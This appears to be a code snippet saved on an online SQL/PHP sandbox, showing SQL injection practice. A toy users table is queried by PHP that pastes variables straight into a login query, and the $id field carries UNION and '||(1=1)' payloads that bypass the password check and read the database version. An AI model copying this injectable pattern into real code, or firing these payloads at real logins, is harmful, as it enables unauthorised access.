Hi! Could we please enable some services and cookies to improve your experience and our website?
Online Sandbox for SQL and PHP: Write, Run, Test, and Share SQL Queries and PHP Code
CREATE TABLE users
(`username` varchar(20), `id` int, `password` varchar(20))
;
INSERT INTO users (username, id, password)
VALUES ("victim", 2, "passkey");
INSERT INTO users (username, id, password)
VALUES ("admin", 21, "pdasskey");
INSERT INTO users (username, id, password)
VALUES ("admdsain", 1, "sdaf");
<?php
$username = "victim";
$id = "2)||(1=1)UNION(select @@version, @@version, @@version )#";
$id = "2)||(1=1)UNION(select@@version,1,2,3)#";
// $id = "1)||( @@version >= "8.0.39-" )#";
// $id = "2)||(1=1)#";
$password = "passkdey";
$query = "SELECT * FROM users WHERE (username='$username' and id=$id) and password='$password'";
// $query = "SELECT SUBSTRING(@@version,4,5) as res";
echo $query;
echo "\n\n";
$result = $mysqli->query($query);
while($row = mysqli_fetch_assoc($result)){
foreach($row as $cname => $cvalue){
print "$cname: $cvalue\t";
}
print "\r\n";
}